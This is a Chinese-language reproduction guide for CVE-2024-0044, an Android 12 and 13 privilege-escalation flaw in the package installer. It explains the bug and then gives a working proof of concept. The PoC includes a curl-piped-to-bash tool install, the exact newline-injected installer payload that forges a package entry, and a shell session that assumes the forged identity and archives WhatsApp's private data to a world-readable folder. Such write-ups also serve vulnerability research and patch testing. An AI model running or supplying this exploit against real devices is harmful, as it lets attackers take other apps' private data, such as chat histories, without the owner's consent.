复现CVE-2024-0044 安卓设备高危漏洞 影响Android 12，13

背景

存在漏洞的软件包是 platform/frameworks/base，它是 Android 生态系统的基本组成部分。它为 Android 操作系统提供基本功能和服务。此软件包负责管理 Android 框架的各个方面，包括软件包安装和会话管理。不幸的是，PackageInstallerService.java 文件的 createSessionInternal 函数中发现了一个漏洞，该漏洞允许进行不正确的输入验证。此漏洞影响 Android 版本 12 和 13，可能导致本地特权提升，而无需额外的执行特权。利用此漏洞不需要用户交互。

漏洞详细信息

该漏洞源于 PackageInstallerService.java 的 createSessionInternal 函数中输入验证不当。这允许攻击者执行以任何应用程序身份运行的攻击，使他们能够以 Android 调试桥 (ADB) 中的任何应用程序身份执行命令。通过在 packages.list 文件中注入换行符，攻击者可以操纵应用程序安装过程并获得提升的权限。此漏洞带来了重大风险，因为它可能导致本地权限提升，可能允许攻击者访问敏感数据或在受影响的设备上执行未经授权的操作。

PoC

无root手机

即使安装了 ADB 工具的无根 Android 智能手机也可以利用此漏洞

1. 从 F-Droid 安装 Termux 和 Termux:API 应用

2.安装wget： 

pkg install wget

3.运行termux-adb安装脚本

$ curl -s https://raw.githubusercontent.com/nohajc/termux-adb/master/install.sh | bash

以下是所有 ADB 命令的完整列表

GitHub – mzlogin/awesome-adb: ADB Usage Complete / ADB 用法大全

先决条件

1. 在手机中启用USB调试，并使用USB电缆或无线调试将其连接到机器
2. 将任何apk下载到您的机器上，您可以使用F-DROID

下载该工具

git clone https://github.com/pl4int3xt/cve_2024_0044.git

如何使用该工具

python3 cve_2024_0044.py -P com.whatsapp -A /home/pl4int3xt/Downloads/F-Droid.apk

-P用于指定要运行的目标包名称

-A指定要在设备中推送的 APK 文件

将生成这样的文件payload.txt

PAYLOAD="@null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk

pl4int3xt ~>  adb shell
pixel:/ $ PAYLOAD="@null
> victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pixel:/ $ pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk
Success

pixel:/ $ mkdir /data/local/tmp/wa/                                                                            
pixel:/ $ touch /data/local/tmp/wa/wa.tar
pixel:/ $ chmod -R 0777 /data/local/tmp/wa/
pixel:/ $ run-as victim
pixel:/data/user/0 $ tar -cf /data/local/tmp/wa/wa.tar com.whatsapp